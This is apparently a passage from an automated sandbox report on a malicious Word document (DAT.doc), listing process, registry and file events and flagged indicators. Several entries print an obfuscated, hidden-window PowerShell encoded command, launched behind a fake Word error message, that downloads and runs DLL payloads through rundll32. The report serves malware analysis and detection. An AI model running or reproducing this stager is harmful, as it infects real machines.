AnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yozs\bhycn.bcx',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hxqt\iieutea.ehw',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hszr\zft.hxn',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vnjt\awo.cnn',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dkpu\lbsvbo.gas',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Opqf\zrop.pvh',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Blgp\gmlbr.kph',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mnrm\xmfd.ucf',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wnoc\mhxywle.szw',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqby\jcrucsb.dql',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Etxd\pkvco.wzp',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eiig\mmslr.ajj',RunDLL

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: <ystem.pdbF source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2139174857.0000000002380000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp

Source: DAT.doc

Initial sample: OLE summary subject = Investment Account Garden, Books & Automotive Sleek Planner Ergonomic Cotton Bacon Agent Profound Wooden Enhanced Tasty Gorgeous Soft Shirt end-to-end Estate Russian Ruble

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: DAT.doc	Stream path 'Macros/VBA/Dwztpwkmgv8q9o28r' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Dwztpwkmgv8q9o28r			Name: Dwztpwkmgv8q9o28r

PowerShell case anomaly found

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK	Jump to behavior

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 